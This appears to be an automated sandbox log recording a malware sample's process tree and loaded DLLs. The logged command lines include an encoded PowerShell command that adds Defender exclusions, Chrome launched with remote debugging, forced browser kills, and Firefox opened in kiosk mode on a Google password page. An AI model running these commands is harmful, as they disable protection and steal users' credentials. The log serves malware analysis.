                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2272 -prefMapHandle 2264 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81e41cdf-9cd7-4e6b-84b6-f40482f74e4a} 6864 "\\.\pipe\gecko-crash-server-pipe.6864" 253dc76dd10 socket
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4036 -parentBuildID 20230927232528 -prefsHandle 4400 -prefMapHandle 3816 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {67daa889-b47a-41d1-9d91-f60d147d808b} 6864 "\\.\pipe\gecko-crash-server-pipe.6864" 253ee211110 rdd
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2252,i,12247254292580222694,14534572486204827192,262144 /prefetch:8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe "C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeProcess created: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exe "C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe "C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe "C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe "C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exe "C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe "C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMwAzADMANAAwADAAMQBcAEYAdwBrAGQAcwB6AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADMAMwAzADQAMAAwADEAXABGAHcAawBkAHMAegAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA=Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeProcess created: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exe "C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2272 -prefMapHandle 2264 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81e41cdf-9cd7-4e6b-84b6-f40482f74e4a} 6864 "\\.\pipe\gecko-crash-server-pipe.6864" 253dc76dd10 socket
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4036 -parentBuildID 20230927232528 -prefsHandle 4400 -prefMapHandle 3816 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {67daa889-b47a-41d1-9d91-f60d147d808b} 6864 "\\.\pipe\gecko-crash-server-pipe.6864" 253ee211110 rdd
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2252,i,12247254292580222694,14534572486204827192,262144 /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
